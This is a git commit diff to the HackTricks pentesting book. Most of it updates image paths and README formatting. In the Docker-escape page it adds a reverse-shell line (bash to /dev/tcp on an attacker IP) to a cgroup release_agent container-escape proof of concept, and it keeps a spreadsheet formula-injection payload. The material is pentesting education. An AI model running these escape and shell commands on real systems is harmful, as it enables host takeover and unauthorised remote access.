GitBook: [master] 9 pages and 27 assets modified

2020-12-15 09:03:34 +00:00 · 2020-12-15 09:03:34 +00:00 · 96d7f39ffb
parent 987035fde6
commit 96d7f39ffb
23 changed files with 29 additions and 25 deletions
--- a/.gitbook/assets/1
+++ b/.gitbook/assets/1
--- a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67
+++ b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/1911-pentesting-fox.md
+++ b/1911-pentesting-fox.md
@ -10,7 +10,7 @@ dht udp "DHT Nodes"

 ![](.gitbook/assets/image%20%28182%29.png)

-![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29.png)
+![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29%20%282%29.png)

 InfluxDB

--- a/README.md
+++ b/README.md
@ -1,7 +1,5 @@
 # HackTricks

-
-
 ![](.gitbook/assets/portada-alcoholica.png)

 **Welcome to the page where you will find each trick/technique/whatever I have learnt in CTFs, real life apps and reading researches and news.**
@ -14,14 +12,14 @@ Here you will find the **typical flow** that **you should follow when pentesting

 **Click in the title to start!**

-If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, ****join the [💬](https://emojipedia.org/speech-balloon/) ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**  
-If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.  
-Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
-
-
+If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**  
+If you want to **share some tricks with the community** you can also submit **pull requests** to **\*\*\[**[https://github.com/carlospolop/hacktricks\*\*\]\(https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks)\) **\*\*that will be reflected in this book.  
+Don't forget to** give ⭐ on the github\*\* to motivate me to continue developing this book.

 ![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%286%29.png)

 [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*

-<a rel="license" href="http://creativecommons.org/licenses/by-sa/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by-sa/4.0/88x31.png" /></a><br>Copyright © Carlos Polop 2020.  Except where otherwise specified, the text on <a href="https://github.com/carlospolop/hacktricks">HACK TRICKS</a> by Carlos Polop is licensed under the <a href="https://creativecommons.org/licenses/by-sa/4.0/">Creative Commons Attribution-ShareAlike License 4.0 (International) (CC-BY-SA 4.0)</a>.
+  
+Copyright © Carlos Polop 2020. Except where otherwise specified, the text on [HACK TRICKS](https://github.com/carlospolop/hacktricks) by Carlos Polop is licensed under the [Creative Commons Attribution-ShareAlike License 4.0 \(International\) \(CC-BY-SA 4.0\)](https://creativecommons.org/licenses/by-sa/4.0/).
+
--- a/linux-unix/privilege-escalation/escaping-from-a-docker-container.md
+++ b/linux-unix/privilege-escalation/escaping-from-a-docker-container.md
@ -29,10 +29,17 @@ mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
 echo 1 > /tmp/cgrp/x/notify_on_release
 host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
 echo "$host_path/cmd" > /tmp/cgrp/release_agent
- 
+
+#For a normal PoC =================
 echo '#!/bin/sh' > /cmd
 echo "ps aux > $host_path/output" >> /cmd
 chmod a+x /cmd
+#===================================
+#Reverse shell
+echo '#!/bin/bash' > /cmd
+echo "bash -i >& /dev/tcp/10.10.14.21/9000 0>&1" >> /cmd
+chmod a+x /cmd
+#===================================
 
 sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
 head /output
@ -58,7 +65,7 @@ A container would be vulnerable to this technique if run with the flags: `--secu

 Now that we understand the requirements to use this technique and have refined the proof of concept exploit, let’s walk through it line-by-line to demonstrate how it works.

-To trigger this exploit we need a cgroup where we can create a `release_agent` file _and_ trigger `release_agent` invocation by killing all processes in the cgroup. The easiest way to accomplish that is to mount a cgroup controller and create a child cgroup.
+To trigger this exploit we need a cgroup where we can create a `release_agent` file and trigger `release_agent` invocation by killing all processes in the cgroup. The easiest way to accomplish that is to mount a cgroup controller and create a child cgroup.

 To do that, we create a `/tmp/cgrp` directory, mount the [RDMA](https://www.kernel.org/doc/Documentation/cgroup-v1/rdma.txt) cgroup controller and create a child cgroup \(named “x” for the purposes of this example\). While every cgroup controller has not been tested, this technique should work with the majority of cgroup controllers.

@ -68,7 +75,7 @@ Note that cgroup controllers are global resources that can be mounted multiple t

 We can see the “x” child cgroup creation and its directory listing below.

-```bash
+```text
 root@b11cf9eab4fd:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
 root@b11cf9eab4fd:/# ls /tmp/cgrp/
 cgroup.clone_children  cgroup.procs  cgroup.sane_behavior  notify_on_release  release_agent  tasks  x
@ -82,7 +89,7 @@ The files we add or modify in the container are present on the host, and it is p

 Those operations can be seen below:

-```bash
+```text
 root@b11cf9eab4fd:/# echo 1 > /tmp/cgrp/x/notify_on_release
 root@b11cf9eab4fd:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
 root@b11cf9eab4fd:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent
@ -90,14 +97,14 @@ root@b11cf9eab4fd:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent

 Note the path to the `/cmd` script, which we are going to create on the host:

-```bash
+```text
 root@b11cf9eab4fd:/# cat /tmp/cgrp/release_agent
 /var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/cmd
 ```

 Now, we create the `/cmd` script such that it will execute the `ps aux` command and save its output into `/output` on the container by specifying the full path of the output file on the host. At the end, we also print the `/cmd` script to see its contents:

-```bash
+```text
 root@b11cf9eab4fd:/# echo '#!/bin/sh' > /cmd
 root@b11cf9eab4fd:/# echo "ps aux > $host_path/output" >> /cmd
 root@b11cf9eab4fd:/# chmod a+x /cmd
@ -108,7 +115,7 @@ ps aux > /var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c7

 Finally, we can execute the attack by spawning a process that immediately ends inside the “x” child cgroup. By creating a `/bin/sh` process and writing its PID to the `cgroup.procs` file in “x” child cgroup directory, the script on the host will execute after `/bin/sh` exits. The output of `ps aux` performed on the host is then saved to the `/output` file inside the container:

-```bash
+```text
 root@b11cf9eab4fd:/# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
 root@b11cf9eab4fd:/# head /output
 USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
@ -121,7 +128,6 @@ root         8  0.0  0.0      0     0 ?        I<   13:57   0:00 [mm_percpu_wq]
 root         9  0.0  0.0      0     0 ?        S    13:57   0:00 [ksoftirqd/0]
 root        10  0.0  0.0      0     0 ?        I    13:57   0:00 [rcu_sched]
 root        11  0.0  0.0      0     0 ?        S    13:57   0:00 [migration/0]
-
 ```

 ## `--privileged` flag v2
--- a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
+++ b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
@ -59,7 +59,7 @@ content://com.mwr.example.sieve.DBContentProvider/Passwords/

 You should also check the **ContentProvider code** to search for queries: 

-![](../../../.gitbook/assets/image%20%28121%29%20%281%29%20%281%29.png)
+![](../../../.gitbook/assets/image%20%28121%29%20%281%29%20%281%29%20%281%29.png)

 Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate` method:

@ -76,7 +76,7 @@ When checking the code of the Content Provider **look** also for **functions** n

 ![](../../../.gitbook/assets/image%20%28211%29.png)

-![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29.png)
+![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29%20%281%29.png)

 Because you will be able to call them

--- a/pentesting-web/formula-injection.md
+++ b/pentesting-web/formula-injection.md
@ -41,5 +41,5 @@ The good news is that **this payload is executed automatically when the file is

 It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**

-![](../.gitbook/assets/image%20%2861%29.png)
+![](../.gitbook/assets/image%20%2825%29%20%281%29.png)

--- a/pentesting/pentesting-web/drupal.md
+++ b/pentesting/pentesting-web/drupal.md
@ -24,7 +24,7 @@ Accessing _/user/&lt;number&gt;_ you can see the number of existing users, in th

 ![](../../.gitbook/assets/image%20%2826%29.png)

-![](../../.gitbook/assets/image%20%28227%29%20%281%29.png)
+![](../../.gitbook/assets/image%20%28227%29%20%281%29%20%281%29.png)

 ## Hidden pages enumeration

--- a/pentesting/pentesting-web/wordpress.md
+++ b/pentesting/pentesting-web/wordpress.md
@ -183,7 +183,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
 </methodCall>
 ```

-![](../../.gitbook/assets/image%20%28107%29%20%282%29.png)
+![](../../.gitbook/assets/image%20%28107%29%20%282%29%20%282%29.png)

 ![](../../.gitbook/assets/image%20%28224%29.png)

--- a/reversing/cryptographic-algorithms/README.md
+++ b/reversing/cryptographic-algorithms/README.md
@ -145,7 +145,7 @@ You can identify both of them checking the constants. Note that the sha\_init ha

 Note the use of more constants

-![](../../.gitbook/assets/image%20%28172%29.png)
+![](../../.gitbook/assets/image%20%28253%29.png)

 ## CRC \(hash\)

@ -177,7 +177,7 @@ A CRC hash algorithm looks like:

 The graph is quiet large:

-![](../../.gitbook/assets/image%20%28343%29.png)
+![](../../.gitbook/assets/image%20%28207%29%20%282%29.png)

 Check **3 comparisons to recognise it**:

--- a/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md
+++ b/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md
@ -37,7 +37,7 @@ If you don't want to wait an hour you can use a PS script to make the restore ha

 Note the spotless' user membership:

-![](../../.gitbook/assets/1%20%282%29%20%281%29.png)
+![](../../.gitbook/assets/1%20%282%29%20%281%29%20%281%29.png)

 However, we can still add new users: